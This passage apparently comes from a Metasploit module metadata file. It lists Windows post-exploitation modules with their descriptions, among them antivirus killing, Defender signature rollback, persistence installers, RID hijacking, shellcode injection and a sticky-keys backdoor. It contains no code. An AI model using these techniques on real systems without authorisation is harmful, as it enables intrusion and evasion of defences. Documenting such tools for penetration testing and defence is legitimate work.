Antivirus or Host-based IPS related.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/windows/manage/killav.rb", - "is_install_path": true, - "ref_name": "windows/manage/killav", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "os-resource-loss" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - 
"shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/make_token": { - "name": "Make Token Command", - "fullname": "post/windows/manage/make_token", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Daniel López Jiménez (attl4s)", - "Simone Salucci (saim1z)" - ], - "description": "In its default configuration, this module creates a new network security context with the specified\n logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and\n a new logon session is created and linked to that token. The token is then impersonated to acquire\n the new network security context. This module has no effect on local actions - only on remote ones\n (where the specified credential material will be used). This module does not validate the credentials\n specified.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-06 09:07:57 +0000", - "path": "/modules/post/windows/manage/make_token.rb", - "is_install_path": true, - "ref_name": "windows/manage/make_token", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "AKA": [ - "make_token", - "maketoken" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/migrate": { - "name": "Windows Manage Process Migration", - "fullname": "post/windows/manage/migrate", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "phra " - ], - "description": "This module will migrate a Meterpreter session from one process\n to another. 
A given process PID to migrate to or the module can spawn one and\n migrate to that newly spawned process.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/migrate.rb", - "is_install_path": true, - "ref_name": "windows/manage/migrate", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/mssql_local_auth_bypass": { - "name": "Windows Manage Local Microsoft SQL Server Authorization Bypass", - "fullname": "post/windows/manage/mssql_local_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Scott Sutherland " - ], - "description": "When this module is executed, it can be used to add a sysadmin to local\n SQL Server instances. It first attempts to gain LocalSystem privileges\n using the \"getsystem\" escalation methods. If those privileges are not\n sufficient to add a sysadmin, then it will migrate to the SQL Server\n service process associated with the target instance. The sysadmin\n login is added to the local SQL Server using native SQL clients and\n stored procedures. If no instance is specified then the first identified\n instance will be used.\n\n Why is this possible? By default in SQL Server 2k-2k8, LocalSystem\n is assigned syadmin privileges. 
Microsoft changed the default in\n SQL Server 2012 so that LocalSystem no longer has sysadmin privileges.\n However, this can be overcome by migrating to the SQL Server process.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb", - "is_install_path": true, - "ref_name": "windows/manage/mssql_local_auth_bypass", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/multi_meterpreter_inject": { - "name": "Windows Manage Inject in Memory Multiple Payloads", - "fullname": "post/windows/manage/multi_meterpreter_inject", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "David Kennedy \"ReL1K\" " - ], - "description": "This module will inject into several processes a given\n payload and connect to a given list of IP addresses.\n The module works with a given lists of IP addresses and\n process IDs if no PID is given it will start the given\n process in the advanced options and inject the selected\n payload into the memory of the created module.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/multi_meterpreter_inject.rb", - "is_install_path": true, - "ref_name": "windows/manage/multi_meterpreter_inject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] 
- }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/nbd_server": { - "name": "Windows Manage Local NBD Server for Remote Disks", - "fullname": "post/windows/manage/nbd_server", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Wesley McGrew " - ], - "description": "Maps remote disks and logical volumes to a local Network Block\n Device server. Allows for forensic tools to be executed on the remote disk directly.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/nbd_server.rb", - "is_install_path": true, - "ref_name": "windows/manage/nbd_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/peinjector": { - "name": "Peinjector", - "fullname": "post/windows/manage/peinjector", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Maximiliano Tedesco " - ], - "description": "This module will inject a specified windows payload into a target executable.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/peinjector.rb", - "is_install_path": true, - "ref_name": "windows/manage/peinjector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - 
"needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/persistence_exe": { - "name": "Windows Manage Persistent EXE Payload Installer", - "fullname": "post/windows/manage/persistence_exe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Merlyn drforbin Cousins " - ], - "description": "This module will upload an executable to a remote host and make it Persistent.\n It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login,\n SYSTEM will start on system boot but requires privs. SERVICE will create a new service\n which will start the payload. Again requires privs.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/persistence_exe.rb", - "is_install_path": true, - "ref_name": "windows/manage/persistence_exe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "config-changes" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/portproxy": { - "name": "Windows Manage Set Port Forwarding With PortProxy", - "fullname": "post/windows/manage/portproxy", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module uses the PortProxy interface from netsh to set up\n port forwarding persistently (even after reboot). 
PortProxy\n supports TCP IPv4 and IPv6 connections.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/portproxy.rb", - "is_install_path": true, - "ref_name": "windows/manage/portproxy", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/powershell/build_net_code": { - "name": "Powershell .NET Compiler", - "fullname": "post/windows/manage/powershell/build_net_code", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-08-14", - "type": "post", - "author": [ - "RageLtMan " - ], - "description": "This module will build a .NET source file using powershell. The compiler builds\n the executable or library in memory and produces a binary. After compilation the\n PowerShell session can also sign the executable if provided a path the\n a .pfx formatted certificate. 
Compiler options and a list of assemblies\n required can be configured in the datastore.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/powershell/build_net_code.rb", - "is_install_path": true, - "ref_name": "windows/manage/powershell/build_net_code", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/powershell/exec_powershell": { - "name": "Windows Manage PowerShell Download and/or Execute", - "fullname": "post/windows/manage/powershell/exec_powershell", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nicholas Nam (nick ", - "RageLtMan " - ], - "description": "This module will download and execute a PowerShell script over a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/powershell/exec_powershell.rb", - "is_install_path": true, - "ref_name": "windows/manage/powershell/exec_powershell", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/powershell/load_script": { - "name": "Load Scripts Into PowerShell 
Session", - "fullname": "post/windows/manage/powershell/load_script", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Turner benpturner ", - "Dave Hardy davehardy20 " - ], - "description": "This module will download and execute one or more PowerShell scripts\n over a present powershell session.\n Setting VERBOSE to true will show the stager results.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/powershell/load_script.rb", - "is_install_path": true, - "ref_name": "windows/manage/powershell/load_script", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/pptp_tunnel": { - "name": "Windows Manage Remote Point-to-Point Tunneling Protocol", - "fullname": "post/windows/manage/pptp_tunnel", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module initiates a PPTP connection to a remote machine (VPN server). Once\n the tunnel is created we can use it to force the victim traffic to go through the\n server getting a man in the middle attack. 
Be sure to allow forwarding and\n masquerading on the VPN server (mitm).", - "references": [ - "URL-https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/pptp_tunnel.rb", - "is_install_path": true, - "ref_name": "windows/manage/pptp_tunnel", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/priv_migrate": { - "name": "Windows Manage Privilege Based Process Migration ", - "fullname": "post/windows/manage/priv_migrate", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Josh Hale \"sn0wfa11\" ", - "theLightCosine " - ], - "description": "This module will migrate a Meterpreter session based on session privileges.\n It will do everything it can to migrate, including spawning a new User level process.\n For sessions with Admin rights: It will try to migrate into a System level process in the following\n order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe.\n If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights:\n It will try to migrate to a user level process, if that fails it will attempt to spawn the process\n then migrate to it. 
It will attempt the User level processes in the following order:\n NAME (if specified), explorer.exe, then notepad.exe.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/priv_migrate.rb", - "is_install_path": true, - "ref_name": "windows/manage/priv_migrate", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/pxeexploit": { - "name": "Windows Manage PXE Exploit Server", - "fullname": "post/windows/manage/pxeexploit", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "scriptjunkie" - ], - "description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing a payload to install metsvc, disable the\n firewall, and add a new user metasploit on any Windows partition seen,\n and add a uid 0 user with username and password metasploit to any linux\n partition seen. 
The windows user will have the password p@SSw0rd!123456\n (in case of complexity requirements) and will be added to the administrators\n group.\n\n See exploit/windows/misc/pxesploit for a version to deliver a specific payload.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/windows/manage/pxeexploit.rb", - "is_install_path": true, - "ref_name": "windows/manage/pxeexploit", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/reflective_dll_inject": { - "name": "Windows Manage Reflective DLL Injection Module", - "fullname": "post/windows/manage/reflective_dll_inject", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell ", - "b4rtik" - ], - "description": "This module will inject a specified reflective DLL into the memory of a\n process, new or existing. If arguments are specified, they are passed to\n the DllMain entry point as the lpvReserved (3rd) parameter. 
To read\n output from the injected process, set PID to zero and WAIT to non-zero.\n Make sure the architecture of the DLL matches the target process.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/reflective_dll_inject.rb", - "is_install_path": true, - "ref_name": "windows/manage/reflective_dll_inject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/remove_ca": { - "name": "Windows Manage Certificate Authority Removal", - "fullname": "post/windows/manage/remove_ca", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "vt " - ], - "description": "This module removes the specified CA certificate from the\n system Trusted Root store.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/remove_ca.rb", - "is_install_path": true, - "ref_name": "windows/manage/remove_ca", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/remove_host": { - "name": "Windows Manage Host File Entry Removal", - "fullname": "post/windows/manage/remove_host", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - 
"author": [ - "vt " - ], - "description": "This module allows the attacker to remove an entry from the Windows hosts file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/remove_host.rb", - "is_install_path": true, - "ref_name": "windows/manage/remove_host", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/rid_hijack": { - "name": "Windows Manage RID Hijacking", - "fullname": "post/windows/manage/rid_hijack", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sebastian Castro " - ], - "description": "This module will create an entry on the target by modifying some properties\n of an existing account. 
It will change the account attributes by setting a\n Relative Identifier (RID), which should be owned by one existing\n account on the destination machine.\n\n Taking advantage of some Windows Local Users Management integrity issues,\n this module will allow to authenticate with one known account\n credentials (like GUEST account), and access with the privileges of another\n existing account (like ADMINISTRATOR account), even if the spoofed account is\n disabled.", - "references": [ - "URL-https://web.archive.org/web/20240520163742/https://csl.com.co/rid-hijacking/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/rid_hijack.rb", - "is_install_path": true, - "ref_name": "windows/manage/rid_hijack", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/rollback_defender_signatures": { - "name": "Disable Windows Defender Signatures", - "fullname": "post/windows/manage/rollback_defender_signatures", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "metasploit ", - "luisco100 " - ], - "description": "This module with appropriate rights uses the Windows Defender command-line utility to run an automation\n tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine.\n The tool is prominently used for scheduling scans and updating the signature or definition files,\n but there is a switch created to restore the installed signature definitions to a previous backup copy or\n to the original default set of signatures which is none, disabling all the signatures and allowing malware\n to execute even with the Windows Defender solution enabled.", - "references": [], - 
"platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/rollback_defender_signatures.rb", - "is_install_path": true, - "ref_name": "windows/manage/rollback_defender_signatures", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "Reliability": [], - "SideEffects": [ - "config-changes" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ROLLBACK", - "description": "Rollback Defender signatures" - }, - { - "name": "UPDATE", - "description": "Update Defender signatures" - } - ] - }, - "post_windows/manage/rpcapd_start": { - "name": "Windows Manage Remote Packet Capture Service Starter", - "fullname": "post/windows/manage/rpcapd_start", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module enables the Remote Packet Capture System (rpcapd service)\n included in the default installation of Winpcap. 
The module allows you to set up\n the service in passive or active mode (useful if the client is behind a firewall).\n If authentication is enabled you need a local user account to capture traffic.\n PORT will be used depending of the mode configured.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/rpcapd_start.rb", - "is_install_path": true, - "ref_name": "windows/manage/rpcapd_start", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/run_as": { - "name": "Windows Manage Run Command As User", - "fullname": "post/windows/manage/run_as", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kx499" - ], - "description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default, by setting\n CMDOUT to true output will be redirected to a temp file and read back in to\n display. 
By setting advanced option SETPASS to true, it will reset the user's\n password and then execute the command.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/run_as.rb", - "is_install_path": true, - "ref_name": "windows/manage/run_as", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/run_as_psh": { - "name": "Windows 'Run As' Using PowerShell", - "fullname": "post/windows/manage/run_as_psh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "p3nt4" - ], - "description": "This module will start a process as another user using PowerShell.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/run_as_psh.rb", - "is_install_path": true, - "ref_name": "windows/manage/run_as_psh", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/sdel": { - "name": "Windows Manage Safe Delete", - "fullname": "post/windows/manage/sdel", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "The goal of the module is to hinder the recovery of deleted files by overwriting\n its contents. 
This could be useful when you need to download some file on the victim\n machine and then delete it without leaving clues about its contents. Note that the script\n does not wipe the free disk space so temporary/sparse/encrypted/compressed files could\n not be overwritten. Note too that MTF entries are not overwritten so very small files\n could stay resident within the stream descriptor.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/sdel.rb", - "is_install_path": true, - "ref_name": "windows/manage/sdel", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/shellcode_inject": { - "name": "Windows Manage Memory Shellcode Injection Module", - "fullname": "post/windows/manage/shellcode_inject", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "phra " - ], - "description": "This module will inject into the memory of a process a specified shellcode.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/shellcode_inject.rb", - "is_install_path": true, - "ref_name": "windows/manage/shellcode_inject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/sshkey_persistence": { - "name": "SSH Key Persistence", 
- "fullname": "post/windows/manage/sshkey_persistence", - "aliases": [], - "rank": 400, - "disclosure_date": null, - "type": "post", - "author": [ - "Dean Welch " - ], - "description": "This module will add an SSH key to a specified user (or all), to allow\n remote login via SSH at any time.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/sshkey_persistence.rb", - "is_install_path": true, - "ref_name": "windows/manage/sshkey_persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/sticky_keys": { - "name": "Sticky Keys Persistence Module", - "fullname": "post/windows/manage/sticky_keys", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "OJ Reeves" - ], - "description": "This module makes it possible to apply the 'sticky keys' hack to a session with appropriate\n rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\n login screen or via a UAC confirmation dialog. 
The module modifies the Debug registry setting\n for certain executables.\n\n The module options allow for this hack to be applied to:\n\n SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),\n UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\n OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and\n DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).\n\n The hack can be added using the ADD action, and removed with the REMOVE action.\n\n Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\n to the target prior to running the module. By default, a SYSTEM command prompt is installed\n using the registry method if this module is run without modifying any parameters.", - "references": [ - "URL-https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit", - "URL-https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/sticky_keys.rb", - "is_install_path": true, - "ref_name": "windows/manage/sticky_keys", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ADD", - "description": "Add the backdoor to the target." - }, - { - "name": "REMOVE", - "description": "Remove the backdoor from the target." 
- } - ] - }, - "post_windows/manage/vmdk_mount": { - "name": "Windows Manage VMDK Mount Drive", - "fullname": "post/windows/manage/vmdk_mount", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage\n of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the\n device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with\n extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots\n or clones are linked from the file.", - "references": [ - "URL-http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-09 10:51:17 +0000", - "path": "/modules/post/windows/manage/vmdk_mount.rb", - "is_install_path": true, - "ref_name": "windows/manage/vmdk_mount", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/manage/vss": { - "name": "Windows Manage Volume Shadow Copies", - "fullname": "post/windows/manage/vss", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module will perform management actions for Volume Shadow Copies on the system. 
This is based on the VSSOwn\n Script originally posted by Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.", - "references": [ - "URL-https://web.archive.org/web/20201111212952/https://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-02-23 16:27:12 +0000", - "path": "/modules/post/windows/manage/vss.rb", - "is_install_path": true, - "ref_name": "windows/manage/vss", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "VSS_CREATE", - "description": "Create a new VSS copy" - }, - { - "name": "VSS_GET_INFO", - "description": "Get VSS information" - }, - { - "name": "VSS_LIST_COPIES", - "description": "List VSS copies" - }, - { - "name": "VSS_MOUNT", - "description": "Mount a VSS copy" - }, - { - "name": "VSS_SET_MAX_STORAGE_SIZE", - "description": "Set the VSS maximum storage size" - }, - { - "name": "VSS_UNMOUNT", - "description": "Unmount 